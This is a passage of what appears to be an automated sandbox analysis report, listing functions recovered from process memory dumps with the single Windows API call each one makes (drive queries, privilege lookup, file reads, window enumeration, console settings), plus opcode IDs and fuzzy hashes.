                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        • Opcode ID: ca4272b2eab075651ca665264da7aba5542656a3557093011d870b1a6509ccb8
                                                        • Instruction ID: 0c82d9d5d8d989a9c305cae7efab331e3ce528184333673fc701399ace5502a5
                                                        • Opcode Fuzzy Hash: ca4272b2eab075651ca665264da7aba5542656a3557093011d870b1a6509ccb8
                                                        • Instruction Fuzzy Hash: FB219F725087809FEB22CF25DC45B96FFF4EF06220F0884AEED858B562D235A448DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027B0F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 027B0FB0
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        • Opcode ID: 0acfaf5d62a4e99b36a1a6a8a23edd358d70d629873f34ab5ff3b799cdaf16a7
                                                        • Instruction ID: 3f6189e1f5a151de3016027a74cc6cfa3c58d0da341bd5c235e621dc1776fa50
                                                        • Opcode Fuzzy Hash: 0acfaf5d62a4e99b36a1a6a8a23edd358d70d629873f34ab5ff3b799cdaf16a7
                                                        • Instruction Fuzzy Hash: EA215E7160D7C49FDB138B25DC55B92BFB4EF03214F0D84DAE8888F293D2659408C762
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9AAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01E9AB1A
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: b92cd798423586b90048104b2523c17ef2bc0a088b9e07ce0901d7c765da1ff9
                                                        • Instruction ID: 808e064c2619def820a84af382aff64cf6b004a4d90a82ec1c69f18a53880b2b
                                                        • Opcode Fuzzy Hash: b92cd798423586b90048104b2523c17ef2bc0a088b9e07ce0901d7c765da1ff9
                                                        • Instruction Fuzzy Hash: 832175716053809FDB22CF29DC44B56FFE8EF46214F0884AAED49CB253D265E404C761
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9BABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleMode
                                                        • String ID:
                                                        • API String ID: 4145635619-0
                                                        • Opcode ID: fa9ea8ee6cf78bfff2bb759b4019fe92f9bbd0a2963bb634d7012f4432571959
                                                        • Instruction ID: 258fb58f1fc00a13e0068df22f5c53e5bdb152154cd90b7f809c13b79b5071c1
                                                        • Opcode Fuzzy Hash: fa9ea8ee6cf78bfff2bb759b4019fe92f9bbd0a2963bb634d7012f4432571959
                                                        • Instruction Fuzzy Hash: 4221A1725097C09FEB128F25DC55A96BFE4EF07220F0984DBDD858F2A3D224A908DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027B10D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 027B1148
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        • Opcode ID: aa9244864fe711344e13ea8674ce4a8e2ac2ed1a38ca896791eb9e37f9cb9046
                                                        • Instruction ID: 4178aa5446b2eb4fc8ce2a38a7e44c242d0f2f7cee11c4535c512ade5f7a5ac1
                                                        • Opcode Fuzzy Hash: aa9244864fe711344e13ea8674ce4a8e2ac2ed1a38ca896791eb9e37f9cb9046
                                                        • Instruction Fuzzy Hash: 46216D6140D3C49FD7138B259C64B62BFB4EF57620F0980DBDC858F2A3D2696808D772
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9AF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,8C21EF1A,00000000,00000000,00000000,00000000), ref: 01E9AFBE
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        • Opcode ID: 7e2dee5270f5765cb0f671b77f0e3a7c05e7f9c89be0c674778836749fe7325b
                                                        • Instruction ID: 04a45c3a795961f69fb43f4c4e19683c735df1bf0e1ff37fe95cc232657bcc2b
                                                        • Opcode Fuzzy Hash: 7e2dee5270f5765cb0f671b77f0e3a7c05e7f9c89be0c674778836749fe7325b
                                                        • Instruction Fuzzy Hash: 3811C1B2500704EFEB21DF55DC85FAAFBE8EF44720F14846AED499B281D670A944CBB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9BA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01E9BA7E
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 46101c26285d75fa0899a0848bb6d0b137cbdc340f84533739153a988222f023
                                                        • Instruction ID: 3f2eafc831fa87339a0a5b3b40e819688dce8d3097f500c5a6cf3119074c074e
                                                        • Opcode Fuzzy Hash: 46101c26285d75fa0899a0848bb6d0b137cbdc340f84533739153a988222f023
                                                        • Instruction Fuzzy Hash: 98119D72508384AFDB22CF65DC44B52FFF4EF05210F08849AE9898B662D375A418CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027B0886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,8C21EF1A,00000000,00000000,00000000,00000000), ref: 027B08E5
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 358230e99f829b02221d3954e162f43edfd0d1f95be807ff957e1cb6c2acda89
                                                        • Instruction ID: f6a2f06e7d248856791d2842a00548099f644394804031373b6767c2fe4e5e04
                                                        • Opcode Fuzzy Hash: 358230e99f829b02221d3954e162f43edfd0d1f95be807ff957e1cb6c2acda89
                                                        • Instruction Fuzzy Hash: 1C11BC72400704EFEB22CF51DC85FA7FBE8EF18720F04856AED499A251C671A908CBB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9A33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: Flags
                                                        • String ID:
                                                        • API String ID: 3401871038-0
                                                        • Opcode ID: 925d588e52e2f7bb848187f60887361163e2ca951abe68f51e3220083cb72705
                                                        • Instruction ID: 26a3147615bd90d20cbc3c99b063148f68d421f34e68e7e95f099ea75b9f091f
                                                        • Opcode Fuzzy Hash: 925d588e52e2f7bb848187f60887361163e2ca951abe68f51e3220083cb72705
                                                        • Instruction Fuzzy Hash: BF114F715093C49FEB128B15DC54A66FFB4DF47614F0880DBEDC54F253D265A808DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027B12D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 027B132F
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        • Opcode ID: e2fd4b9b22d9b29d6455a5d22b1b9becf509cc0d0a5ad087480478b3e88fd22c
                                                        • Instruction ID: 84935513c4abb8c1693033efdd31a137c7fd0402173e5b1d6ddea5702526fa8f
                                                        • Opcode Fuzzy Hash: e2fd4b9b22d9b29d6455a5d22b1b9becf509cc0d0a5ad087480478b3e88fd22c
                                                        • Instruction Fuzzy Hash: D71191715093849FDB128F25DC59B96FFE4EF46220F0984EFED898B252D275A808CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027B05E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 027B0640
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        • Opcode ID: bcefae93cb39ff22a0d2b24c075602d1134c9ceab1a880e334dc9ea851e3b31a
                                                        • Instruction ID: b24efb6cf43cebbd53283cbba375408e349dc8d362193820357d623c4c4da96f
                                                        • Opcode Fuzzy Hash: bcefae93cb39ff22a0d2b24c075602d1134c9ceab1a880e334dc9ea851e3b31a
                                                        • Instruction Fuzzy Hash: B41106755093C09FD7128B25DC44B52FFB4EF42224F0880DBEC858B253D264A808CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9AAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01E9AB1A
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: 7064b18617e84fa744834391938ec760f1620577e156504c92faa2cebe025b5e
                                                        • Instruction ID: 24433a6e0cdaf8d1a42853ef06013670c7f7f4db74acfaf5ad069bec36a51e76
                                                        • Opcode Fuzzy Hash: 7064b18617e84fa744834391938ec760f1620577e156504c92faa2cebe025b5e
                                                        • Instruction Fuzzy Hash: AB118EB16003008FEB20DF29DC85B9AFBD8EF44225F08847ADD0ACB242E674E404CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9AA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01E9AA71
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        • Opcode ID: 4fe40f050cc42d0b0e596c19bc0522eb853824674940af4ce68dc59c8dcaa065
                                                        • Instruction ID: 357da93669473eca96687148288686cc36c27dfd39a17ecb439335a0ed364c06
                                                        • Opcode Fuzzy Hash: 4fe40f050cc42d0b0e596c19bc0522eb853824674940af4ce68dc59c8dcaa065
                                                        • Instruction Fuzzy Hash: F311E37540D7C09FDB128B15DC85B92BFB0EF43224F0980DBDD848F1A3D268A909C762
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027B092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 027B099C
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: 61c18614865660a0b11170139416ccb43244c4c160992b9be482b7221cfea360
                                                        • Instruction ID: 6b2e2bc5a810254afdb152e26f7f43ba4716d478306727aceea3e28d33e2cdfa
                                                        • Opcode Fuzzy Hash: 61c18614865660a0b11170139416ccb43244c4c160992b9be482b7221cfea360
                                                        • Instruction Fuzzy Hash: C4119D714097C49FE7228B25DC55B92FFA4EF07324F0980DBDD844B263C265A908CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027B07C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,8C21EF1A,00000000,00000000,00000000,00000000), ref: 027B0819
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: 6daf516764204438425066b5cef90e8ea8c0c823753d9d8f3f06a7af2fb1b26b
                                                        • Instruction ID: c719a46345257eb1fa2284e6d4dc3f0d3dd74b2d2a64503c7d1986ad1927160f
                                                        • Opcode Fuzzy Hash: 6daf516764204438425066b5cef90e8ea8c0c823753d9d8f3f06a7af2fb1b26b
                                                        • Instruction Fuzzy Hash: 8D018071500704EFFB219F15DC86BA7FB98EF44721F148096ED099A281D674AA04CAA6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027B13AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        • Opcode ID: 55c5d19764a2be545c62de845a5c674121f442ec6e2f1930f50899ace6580dae
                                                        • Instruction ID: 1df62884794acc1617614c1e8edfb45bae1b17368de6822d607e8cbc169c4a71
                                                        • Opcode Fuzzy Hash: 55c5d19764a2be545c62de845a5c674121f442ec6e2f1930f50899ace6580dae
                                                        • Instruction Fuzzy Hash: FA118B76500700DFEB21CF56DC85BA6FBE4EF04220F0884AAED4A8B652D371E418CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9AB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01E9ABC9
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        • Opcode ID: 6a0d2ca2f008d7f99a0c8b651b77c00ce31f8367cb706955aa10103614eec309
                                                        • Instruction ID: 48dee013e44057afba573a59c2f827f3f605bd60236f2f9b99f15afe2ab91275
                                                        • Opcode Fuzzy Hash: 6a0d2ca2f008d7f99a0c8b651b77c00ce31f8367cb706955aa10103614eec309
                                                        • Instruction Fuzzy Hash: F911CEB54093809FDB11CF25DC89B82FFA4EF42224F0980ABED488F253D274A508CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9BA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01E9BA7E
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 19bdc9a45723387599142dd31203a73a6c7e7ecac6ea12fce663268f741ba8c0
                                                        • Instruction ID: 58492a3cfe64280c227a8dcc2f45f217a740d6fa5bf45f8affbe628d9839c438
                                                        • Opcode Fuzzy Hash: 19bdc9a45723387599142dd31203a73a6c7e7ecac6ea12fce663268f741ba8c0
                                                        • Instruction Fuzzy Hash: 45118E72500704DFEF21CF55DC84B56FBE4FF08621F0884AADD898A612D375E414DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9A1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnumWindows.USER32(?,00000E9C,?,?), ref: 01E9A23E
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumWindows
                                                        • String ID:
                                                        • API String ID: 1129996299-0
                                                        • Opcode ID: e6d074448648d3e3b1cde639fe56108cf9dd2d045909f4d471db3a79ed296561
                                                        • Instruction ID: 6964ec136dc1ce29b150ce431c63b7ee63e8a2af8fbb0a9debcb77ee8277ec97
                                                        • Opcode Fuzzy Hash: e6d074448648d3e3b1cde639fe56108cf9dd2d045909f4d471db3a79ed296561
                                                        • Instruction Fuzzy Hash: CE018471900600AFE310DF16DC46B66FBE8FB84A20F14816AED089B741D235F515CBE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027B104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 027B109E
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        • Opcode ID: 94cdb4a15c85c859f15c3bd11c2f824b5b26f47e6e9c34795fc6b07d82e3aa34
                                                        • Instruction ID: 14b40cd87cbffdf1f62cecb18cd561dd2712e5d8ecd6da2af9be2ce5db596d9b
                                                        • Opcode Fuzzy Hash: 94cdb4a15c85c859f15c3bd11c2f824b5b26f47e6e9c34795fc6b07d82e3aa34
                                                        • Instruction Fuzzy Hash: A6017171900600ABE310DF16DC46B66FBE8FB84A20F14816AED089B741D235B515CBE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027B0196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 027B01D0
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        • Opcode ID: 85826679c9d76f7d9433438dabff2d64d66aa0ce66dbbe20050759947946710d
                                                        • Instruction ID: 5f09a4899795fae1c29fd72000e0954ce69ab750c38e40a9fe8f58bc308929f9
                                                        • Opcode Fuzzy Hash: 85826679c9d76f7d9433438dabff2d64d66aa0ce66dbbe20050759947946710d
                                                        • Instruction Fuzzy Hash: DC015E71A00744DFEB11DF65DC857ABFBD8EF01620F08C4AADC09CB642D674E408CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9BAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleMode
                                                        • String ID:
                                                        • API String ID: 4145635619-0
                                                        • Opcode ID: 21ac512817f491cdcd2e2ab78c978d06f72a0321628f708ba9cd0b788bdb2b39
                                                        • Instruction ID: a192c78af528cf3cf67843eae93568bad6f0e2a225c4ff732658a92503dd8035
                                                        • Opcode Fuzzy Hash: 21ac512817f491cdcd2e2ab78c978d06f72a0321628f708ba9cd0b788bdb2b39
                                                        • Instruction Fuzzy Hash: 3701D471500600DFEF20CF15EC85BA9FBD4EF04620F08C4ABDD4A8B296E275A404CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027B12FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 027B132F
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        • Opcode ID: 32889a6f148acf80964997517ce9451e8906e5a9f906b4bf308203a3a84ca9bf
                                                        • Instruction ID: 8af5a23ad01a746ee0cf2c45d4ffef785b64c3783e8ecdc9b45b986d16b35784
                                                        • Opcode Fuzzy Hash: 32889a6f148acf80964997517ce9451e8906e5a9f906b4bf308203a3a84ca9bf
                                                        • Instruction Fuzzy Hash: D501BC71504300DFEF118F15DC857A6FBE4EF04620F48C4AADC098B642E275A404CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9A8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01E9A94A
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        • Opcode ID: 11b235aae4d35cad8ce6cdb2f400aece1dd6d8e1f24e2ffafada70168c3059a7
                                                        • Instruction ID: ff78c4aaa7871bb7ad085426982bf9cb1ac98dbaa6b1ca9a7c06a95e9a5cffc2
                                                        • Opcode Fuzzy Hash: 11b235aae4d35cad8ce6cdb2f400aece1dd6d8e1f24e2ffafada70168c3059a7
                                                        • Instruction Fuzzy Hash: C6018171900601ABE310DF16DC86B26FBF8FB88B20F14825AED085B741D275F925CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027B0F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 027B0FB0
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        • Opcode ID: 91dc983caa4394df8370e8987ccc817d1c4647200ab27517921a76e1057d8d30
                                                        • Instruction ID: 40f0774268ce65c2e0a3a93510289c22723aa691ce789042bfeea5cf91c75466
                                                        • Opcode Fuzzy Hash: 91dc983caa4394df8370e8987ccc817d1c4647200ab27517921a76e1057d8d30
                                                        • Instruction Fuzzy Hash: 23017871A00344DFEB21DF15D889BA6FBE4EF01660F08C4AADC088F246D374E408CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027B04B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 027B0502
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        • Opcode ID: d8f8c06aae93e411f278763804f4b0ff7919c587979d6a2241c7381b0e862bcb
                                                        • Instruction ID: d8bc395b051fba0046edc463d63f2ae84e7c94fe09e63239b938eb3ff99ec373
                                                        • Opcode Fuzzy Hash: d8f8c06aae93e411f278763804f4b0ff7919c587979d6a2241c7381b0e862bcb
                                                        • Instruction Fuzzy Hash: D3016D71900601ABE310DF16DC86B26FBE8FB88B20F14825AED085B741D275F925CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027B060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 027B0640
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        • Opcode ID: 257017e18a59546271e6695203e819c3148f37ef136e86f6a37aa027d3cc1d5d
                                                        • Instruction ID: ad9fcc43e66cc063e1fa3290e836767dbac0378426a53643dac7a3c22e66ad2b
                                                        • Opcode Fuzzy Hash: 257017e18a59546271e6695203e819c3148f37ef136e86f6a37aa027d3cc1d5d
                                                        • Instruction Fuzzy Hash: 7301F435600700CFEB118F25DC897A6FBA0EF41625F08C0ABDC498B752D274E408CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9AB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01E9ABC9
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        • Opcode ID: 699d3df6b81639c264cff645cf9a4c28f0cb83d3a6dc6c9982e8feac64f116d3
                                                        • Instruction ID: 83b03eca887a13324c8394f6d122ec94607b73674c457c350159483fdb0ebc65
                                                        • Opcode Fuzzy Hash: 699d3df6b81639c264cff645cf9a4c28f0cb83d3a6dc6c9982e8feac64f116d3
                                                        • Instruction Fuzzy Hash: 9D01DC71404740CFEF10DF19DC89BA6FBA4EF84220F48C4ABDD098F242E274A444CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027B1116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 027B1148
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        • Opcode ID: 362d5426bba372165968ac32c67fcb865dc5c70f74add2ea198f5621f9244d3b
                                                        • Instruction ID: d6a6c3d48f705e139323d452ad9716297cd944c3282a5142783198f73aed77da
                                                        • Opcode Fuzzy Hash: 362d5426bba372165968ac32c67fcb865dc5c70f74add2ea198f5621f9244d3b
                                                        • Instruction Fuzzy Hash: C7F0AF35504748DFEB21CF05DC897A6FBA4EF05A21F48C0ABDD494B352D675A448CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E9A36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2157583369.0000000001E9A000.00000040.00000001.sdmp, Offset: 01E9A000, based on PE: false
                                                        Similarity
                                                        • API ID: Flags
                                                        • String ID:
                                                        • API String ID: 3401871038-0
                                                        • Opcode ID: 3300396e151689efc2efbea6dd5fdfa040d080fc970aabc67ab6abc8b695b45e
                                                        • Instruction ID: 1e354a8b017f66297ebc5f87eb847ccc7ac28db16d082c66d066de4d6fe4016b
                                                        • Opcode Fuzzy Hash: 3300396e151689efc2efbea6dd5fdfa040d080fc970aabc67ab6abc8b695b45e
                                                        • Instruction Fuzzy Hash: 15F0AF35504744DFEB20DF05D889769FBA0EF84625F08D0AADD494B352D3B5A408CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027B096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 027B099C
                                                        Memory Dump Source
                                                        • Source File: 0000001B.00000002.2165335056.00000000027B0000.00000040.00000001.sdmp, Offset: 027B0000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
